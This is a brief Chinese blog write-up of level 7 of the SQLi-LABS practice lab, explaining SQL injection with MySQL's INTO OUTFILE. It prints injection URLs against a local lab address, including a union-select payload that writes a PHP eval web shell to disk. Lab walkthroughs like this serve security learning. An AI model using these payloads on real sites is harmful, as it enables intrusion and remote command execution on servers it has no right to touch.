标签:index.php 源代码 127.0.0.1 dex sql com 使用 class union
该关卡最主要的就是想要我们学习到Outfile函数(文件写入函数)的使用。
通过源代码我们很容易的写出了payload。倘若我们一个个去尝试的话,说实话,不容易。
http://127.0.0.1/sql/Less-7/index.php?id=1‘)) and 1=1--+
Payload:
http://127.0.0.1/sql/Less-7/index.php?id=1‘)) union select 1,‘<?php eval($_POST[cmd])?>‘,3 into outfile ‘H://zhenxishaonianshi.txt‘--+
虽然提示了语法错误。但是我们看看。在H盘是真实的存在的。
THE END
Sqli-LABS通关笔录-7[文件写入函数Outfile]
标签:index.php 源代码 127.0.0.1 dex sql com 使用 class union
原文地址:http://www.cnblogs.com/xishaonian/p/6111757.html